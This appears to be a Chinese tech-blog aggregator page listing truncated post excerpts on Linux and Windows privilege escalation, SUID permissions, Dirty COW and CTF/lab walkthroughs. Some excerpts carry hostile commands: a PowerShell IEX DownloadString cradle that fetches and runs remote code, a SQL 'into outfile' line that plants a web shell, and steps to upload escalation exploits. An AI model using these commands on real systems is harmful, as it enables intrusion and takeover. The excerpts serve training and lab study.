E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
SUID提权
Pumpkin Raising Walk Through
概述:这个靶机的规则是根据提示获取南瓜的seed,然后根据一次获取的seed登录服务器并完成
提权
,里面涉及到一些CTF的知识,加密解密,
提权
!
APT-101
·
2019-08-02 11:00
MS16-023
提权
+ 信息收集 + 静默WinPcap安装 + WinDump抓包
0x01MS16-023
提权
powershell-nop-execbypass-c"IEX(New-ObjectNet.WebClient).DownloadString('https://raw.githubusercontent.com
publicstr
·
2019-08-01 21:56
6、用户组和权限管理-实验手册
熟悉特殊权限
suid
、sgid、sticky、acl的功能和⽤法。实验步骤了解useradd命令添加用户时使用的参数,如-g设置主组,-G设置基本组,-s这种默认shell,-M不创建家目录等内容。
USCWIFI
·
2019-07-30 14:27
ACL权限
chmod
chown
Linux练习题
网络安全 (八
提权
)
在不知道木马密码的情况下可以在后面写上?profile=a(不一定成功)http://1.11.1.1:8000/2.asp?profile=aWindnowsuser(普通)administrator(管理员)system(控制)三者不是完全包含,administrator一定包含user,system与另外两者有交集部分Linuxuserroot提高执行的权限针对网站测试过程,当测试某一网站时
Aidang
·
2019-07-30 08:46
Linux
提权
—脏牛漏洞(CVE-2016-5195)
目录脏牛漏洞复现:脏牛漏洞脏牛漏洞,又叫DirtyCOW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linuxkernel团队在2016年10月18日已经对此进行了修复。漏洞范围:Linux内核>=2.6.22(2007年发行,到2016年10月18日才修复)简要分析:该漏洞具体为,Linux内核的内存子系统在处理写入复制(copy-on-w
谢公子
·
2019-07-25 15:57
提权
Linux
提权
讲Linux
提权
之前,我们先看看与Linux有关的一些知识:我们常说的Linux系统,指的是Linux内核与各种常用软件的集合产品,全球大约有数百款的Linux系统版本,每个系统版本都有自己的特性和目标人群
谢公子
·
2019-07-24 23:05
linux系统安全
提权
脏牛
提权
(cve-2016-5159)
漏洞范围:大于2.6.22版本(2007年发行,到2016年10月18日修复)危害:低权限的用户可利用这一漏洞在本地进行
提权
原理:linux内核的子系统在处理写入时复制至产生了竞争条件,恶意用户可利用此漏洞来获取高权限
haha13l4
·
2019-07-22 23:31
linux
渗透测试
漏洞复现
Vulnhub之 DC-3 joomla注入和ubuntu16.04
提权
Vulnhub靶机之DC-3前言刚考完试,然而不能放弃对技术的热爱,又重新拾起了dc准备把他们6个做完今天介绍的是dc-3,来看看作者对他的评价描述:DC-3是另一个专门建造的脆弱实验室,旨在获得渗透测试领域的经验。与之前的DC版本一样,这个版本在设计时考虑了初学者,虽然这一次,只有一个标志,一个入口点,根本没有线索。Linux技能和熟悉Linux命令行是必须的,基本渗透测试工具的一些经验也是必须
ST0new
·
2019-07-21 00:45
靶机
提权
当我们拿到WebShell之后,下一步干什么?当然是权限提升啊!简介通过这些最初的漏洞利用途径,攻击者将获得一定的访问权限。接着,攻击者将逐步探查其破坏的系统来获得比最初更多的权限,以期望从其他账户访问敏感信息,甚至或者获得对整个系统的完全管理控制。当攻击者以这种方式扩大其最初的未经授权访问的权限时,我们将其行为称为权限提升攻击。水平权限提升(越权)我们假设攻击者已经获得了在线银行账户的访问权限,
刘三羊
·
2019-07-15 19:45
网络安全
i春秋DMZ大型靶场实验(四)Hash基础
sqlmap.py-rbp.txt--dbs利用sqlmap跑出root密码root666888登录phpmyadmint通过路径报错得到绝对路径c:\\www\\1.phproot权限可以直接写一句话拿shell让后进行udf
提权
一句话写入菜刀连接上传
痱子﹑
·
2019-07-13 09:00
i春秋DMZ大型靶场实验(三)内网转发DMZ2
fielname可以%00截断上传一句话木马对filenameshell_exec未对参数过滤可以拼接执行命令写一句话例如'||echo"">/var/www/html/2.php||'菜刀连接上传脏牛
提权
痱子﹑
·
2019-07-12 20:00
i春秋DMZ大型靶场实验(二)
提权
漏洞
获取跟路径也可以通过输入错路径爆出绝对路径phpmyamin弱口令登录root,rootsql直接写一句话木马select''intooutfile'C:\\phpStudy\\WWW\\1.php'菜刀连接上传ms11080.exe
提权
添加
痱子﹑
·
2019-07-12 11:00
提权
与信息收集-安全牛学习笔记
一、本地
提权
Windows下的常见用户userAdministratorSystemLinux下的常见用户UserRootWindows账户管理命令netuser查看用户信息netlocalgroup查看组信息
lsj00凌松
·
2019-07-05 23:44
网络安全
2018-2019-2 20165215《网络对抗技术》Exp10 Final Windows本地内核
提权
+Exploit-Exercises Nebula学习与实践
目录PARTONE:Windows本地内核
提权
漏洞概述漏洞原理漏洞复现windbg调试本地内核查看SSDT表和SSDTShadow表查看窗口站结构体信息利用Poc验证漏洞漏洞利用分配零页内存构造能够获取
匪夷所思05
·
2019-06-29 22:00
Linux渗透与
提权
:技巧总结篇
本文为Linux渗透与
提权
技巧总结篇,旨在收集各种Linux渗透技巧与
提权
版本,方便各位同学在日后的渗透测试中能够事半功倍。
Coisini、
·
2019-06-23 19:00
安全开发
实战篇
Windows渗透与
提权
:技巧总结篇
旁站路径问题:1、读网站配置。2、用以下VBS:OnErrorResumeNextIf(LCase(Right(WScript.Fullname,11))="wscript.exe")ThenMsgBoxSpace(12)&"IISVirtualWebViewer"&Space(12)&Chr(13)&Space(9)&"Usage:CscriptvWeb.
Coisini、
·
2019-06-23 19:22
安全开发
实战篇
windows提权与渗透
Windows总结渗透
Final——PowerShell Empire
一、介绍Empire是一款针对Windows平台的、使用PowerShell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、
提权
到渗透维持的一系列功能。
20165330张羽昕
·
2019-06-23 13:00
获取Shell后的操作
第一步,先whoami查看用户身份,如果是系统用户那就再好不过了,如果是普通用户的话,就得想办法
提权
了。关于Windows
提权
:Windows
提权
提权
之后,利用mimikatz获
谢公子
·
2019-06-21 19:33
内网渗透
渗透测试
红蓝对抗
SQL Server
提权
方法汇总(MSSQL)
使用sp_oacreate进行
提权
--
提权
语句--sp_configure的作用是显示或更改当前服务器的全局配置设置,执行成功返回0,失败返回1EXECsp_configure'showadvancedoptions
Margin_51cto
·
2019-06-21 08:53
SQL
Server提权
CISP-PTE
MSSQL提权
Web安全
SUID
, SGID 和 Sticky Bit 到底是什么
分别是:SUIDSGIDStickybitSet-userIdentification(
SUID
)你是否想过,一个非root用户是如何通过修改他的密码,并且新的密码写入到一个他没有写权限的文件/etc/
JayL
·
2019-06-20 00:00
devops
linux
WEB 安全之 SQL注入 < 三 >
提权
前两篇文章介绍了攻击者通过构造SQL语句来获得“非授权信息”,都是停留在数据库层面的,其实它的威力可不仅仅止于此吆。如果DB管理员有疏忽,再加上页面有注入漏洞,危害不仅仅像前两篇最终网站后台沦陷搞不好整个系统都有可能被人控制。测试环境跟上一篇相同,MSQL+asp.net +win7。前面已经拿下了管理员用户名、密码,我们还是使用新闻详细页面(方便测试,不设防):publicpartialclas
茶乐乐
·
2019-06-19 22:00
CTF中对web服务器各种
提权
姿势
在我们拿下服务器web服务往往只是低权限用户,对于内网渗透,我们往往需要root权限,Linux系统
提权
包括使用溢出漏洞已及利用系统配置文件。
Wings_shadow
·
2019-06-19 19:00
linux
linux是多用户操作系统,不同用户有不同的权限(
提权
)/etc/shadowdate-d"1970-01-01xxxdays"/etc/passwdlinux三类用户:root用户:根用户也就是超级用户
秋名山车神
·
2019-06-19 00:00
html
npm
渗透测试——
提权
方式总结
(内容整理自网络)一、什么是
提权
提权
就是通过各种办法和漏洞,提高自己在服务器中的权限,以便控制全局。
橘子女侠
·
2019-06-11 15:12
kali
Linux
渗透测试
云原生生态周报 Vol. 7 | Docker 再爆 CVE
原文链接:https://my.oschina.net/u/1464083/blog/3060707业界要闻Docker基础镜像Alpine爆出
提权
漏洞(CVE-2019-5021):该CVE影响自AlpineLinux3.3
chikuai9995
·
2019-06-11 15:00
渗透笔记
0x00前言本实验是一次非常深入彻底的模拟渗透,虽然只针对一台服务器,但却经历了从最初的获取网站管理员账号密码,到获得网站的webshell,最后到通过
提权
获得服务器系统最高权限的完整渗透过程。
时光途径
·
2019-06-11 13:19
渗透
黑客
数据库
破解
hash
Kali
Linux
Linux
Android进阶——性能优化之进程
提权
与拉活原理及手段完全解析(九)
文章大纲引言一、系统账户同步机制拉活1、继承Service并在内部继承实现用于返回Binder的AbstractAccountAuthenticator2、在res/xml/文件夹下定义将要显示在Account列表的资源3、在清单文件中配置AuthenticationService4、创建App的账户5、创建账户同步Service6、告知系统我们的Account需要进行同步服务7、完整的清单配置文
CrazyMo_
·
2019-06-10 10:26
Android
进阶
Android性能优化
su切换用户和sudo用户
提权
su切换的基本用法:SubstituteUser,切换用户快速切换为指定的其他用户普通用户执行时,需要验证目标用户的口令root执行时,无需验证口令命令格式用法一:su[-]目标用户用法二:su[-]-c“命令”目标用户su和su-的区别:su:只是切换成了目标用户,shell环境仍然为root的shell,通过pwd可以查看切换用户后的工作目录su-:用户身份和shell环境一起切换为目标用户[
刘鑫的博客
·
2019-06-04 13:30
linux
sudo
渗透的常见术语
脚本:网站的编辑语言serv-u利用脚本(asp/aspx/php)serv-u利用脚本(asp/aspx/php)每次用都得搜,说不准那天就搜不到了,直接存起来是最好的选择.
提权
完毕,已执行了命令:Serv-U
MIGENGKING
·
2019-06-03 22:58
域环境users
提权
调用lsrunase.exe 批处理完成安装字体
字体安装2.0由于字体安装之前的批处理采用字体文件复制到c:\windows\fonts下再注册注册表的方式,一部分字体安装不上,重新修改了批处理方式。一.字体安装批处理1.vbs脚本运行安装D:\fonts下的字体安装包,安装时fonts.vbs同时会检测C:\windows\fonts\字体名称与D:\fonts里的字体名是否一致,如果存在则忽略掉。缺点:若是表面字体名不一致,会提示重复安装,
lv287
·
2019-06-02 16:22
安装字体
一些常用的adb指令
重启adbinstallapk路径(拖拽即可)安装apkadbuninstall包名卸载apkadbpull…拉取文件adbshellinputkeyevent4模拟返回键adbshell:命令含义su
提权
Zcurry
·
2019-05-29 14:08
Android
MS09-020 iis6.0
提权
漏洞编号:MS09-020披露日期:2009/6/9受影响的操作系统:Windows2003x64sp1sp2;XP;测试系统:windows2003x64上传执行iis6.0.exe"netusertemp123.com/add"netuser
痱子﹑
·
2019-05-27 14:00
MS09-012 PR
提权
漏洞编号:MS09-012披露日期:2009/4/14受影响的操作系统:Windows2008x64x86;XP;Server2003sp1sp2;测试系统:windows2003x86上传到有执行的权限的目录在大马上运行创建成功
痱子﹑
·
2019-05-27 13:00
MS12-042 用户态调度机制特权提升漏洞
MS12-042披露日期:2012/6/12受影响的操作系统:Windows2000;XP;Server2003;windows7;Server2008;测试系统:windows7x64利用网上现有的
提权
工具测试运行
痱子﹑
·
2019-05-26 18:00
提权
案例(一)渗透某asp.net网站通过sql server数据库public
提权
思路分享
先罗列出sqlserver角色用户的权限按照从最低级别角色(bulkadmin)到最高级别角色(sysadmin)的顺序进行描述:1.bulkadmin:这个角色可以运行BULKINSERT语句.该语句允许从文本文件中将数据导入到SQLServer2008数据库中,为需要执行大容量插入到数据库的域帐号而设计.2.dbcreator:这个角色可以创建,更改,删除和还原任何数据库.不仅适合助理DBA角
痱子﹑
·
2019-05-26 11:00
提权
(最全的WEBSHELL)
最全的WEBSHELLc:d:e:…C:\DocumentsandSettings\AllUsers\「开始」菜单\程序\看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,C:\DocumentsandSettings\AllUsers\ApplicationData\Symantec\pcAnywhere\看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解
Coisini、
·
2019-05-24 11:22
靶机渗透(十二)evilscience
nmap)4.网站指纹信息扫描(whatweb)(二)Web渗透1.浏览web网页(80端口)2.目录扫描(dirb)3.文件包含漏洞利用>另一种执行ls命令的方法4.获取shell>获取反弹shell5.
提权
一
沐晗子xuer
·
2019-05-23 09:22
靶机渗透
渗透测试之中间件安全
文章目录ApacheNginxIIS短文件名猜解漏洞漏洞成因漏洞利用文件名解析漏洞利用方式利用条件漏洞修复远程代码执行漏洞MS-15-034CVE-2017-7269漏洞成因利用方式利用条件:漏洞修复
提权
漏洞
Blood_Pupil
·
2019-05-21 22:14
渗透测试
特殊权限
SUID
特殊权限SUIDSUID:运行某程序时,相应进程的属主是程序文件自身的属主,而不是启动者:chmodu+sFilechmodu-sFile如果FileB本身原来就有执行权限,则
SUID
显示为s;否则显示
thelovelybugfly
·
2019-05-21 22:00
第三方应用 flashfxp,filezilla
提权
filezilla
提权
filezilla开源的ftp服务器默认监听14147端口默认安装目录下有个敏感文件filezillaserver.xml(包含用户信息)filezillaserverinterface.xml
痱子﹑
·
2019-05-21 10:00
windows中命令行窗口
提权
到管理员权限.windows 的 sudo
命令行环境中获取管理员权限第一种方法(最爽,但是被运行的命令会被当成新进程运行,运行完成后就自动关闭了.)把以下代码复制到记事本中保存为sudo.vbs然后移动到PATH任意目录中,如windowssystem32等.或自定义目录也可以.使用的时候就想linux中一样.sudodir'ShellExecute方法'作用:用于运行一个程序或脚本。'语法'.ShellExecute"applicati
lvusyy
·
2019-05-21 04:00
第三方软件 G6ftp
提权
lcx.exe-tran8027127.0.0.180214.使用客户端以管理员用户登录5.创建用户并权限设置和执行批处理文件6.上传批处理7.创建普通用户登录ftp8.执行命令quotesitex.bat9.x.bat-添加系统用户
提权
打开配置文件
痱子﹑
·
2019-05-20 09:00
第三方软件 pcanywhere
提权
pcanywhere是一个远程管理软件1.访问pcanywhere默认安装目录访问下载打开利用破解工具直接选择刚刚下载的软件点破解拿到用户密码后去百度下载客户端让后连接
痱子﹑
·
2019-05-20 08:00
第三方软件 Serv-u
提权
可以设定多个FTP服务器、限定登录用户的权限、登录主目录及空间大小等Serv-U
提权
分两种1.有修改权限2.无权限修改第一种情况时0.判断是否安装serv-userv-u的默认端口是43958可以用nmap
痱子﹑
·
2019-05-19 22:00
CVE-2018-8174漏洞复现及内网渗透攻击
本文已在i春秋论坛发表本文涉及的知识点:CVE-2018-8174漏洞复现、内网渗透、权限维持、脚本编程、痕迹清除、端口转发、利用MS17-010
提权
CVE-2018-8174漏洞简介CVE-2018-
Waldo_cuit
·
2019-05-19 13:21
文件权限二(特殊权限、隐藏属性、文件访问控制列表、切换用户方式)
文件特殊权限:
SUID
:将文件执行者临时获取所以者权限;U=user用户命令格式:chmodu+s文件SGID:临时获取所有组权限;G=group组命令格式:chmodg+s文件SBIT:只能自己删除自己的文件
lsy83118
·
2019-05-17 22:51
suid
sgid
sbit
linux
Linux 中的特殊权限
SUID
, SGID , SBIT
Linux中的特殊权限
SUID
,SGID,SBIT文件的特殊权限:
SUID
,SGID,SBIT查看一下文件和目录的权限:#ls-ld/tmp;ls-l/usr/bin/passwddrwxrwxrwt.24rootroot40965
Carey丶zsh
·
2019-05-16 20:52
Linux
HEKE常用linux常用命令,有你不知道的没?
shell浏览目标站不行,命令行下输入ls-la/www.users/2.溢出
提权
#python–c‘impotrpty;pty.
马哥教育
·
2019-05-14 15:20
Linux运维
Linux云计算
linux***常用命令
linux运维
mysql
提权
之udf
提权
提权
的前提mysql版本大于5.1,udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下mysql版本小于5.1,udf.dll文件在windowsserver2003下放置于c
migrate_
·
2019-05-10 19:57
渗透测试实战8——SickOS靶机入侵
目录一、实验环境二、实验步骤主动信息收集端口探测——22端口端口探测——80端口1、目录探测2、获取shell3、
提权
4、防火墙规则一、实验环境攻击机(Kali):192.168.247.181靶机(SickOS
浅浅爱默默
·
2019-05-10 16:19
Kali渗透测试
上一页
57
58
59
60
61
62
63
64
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他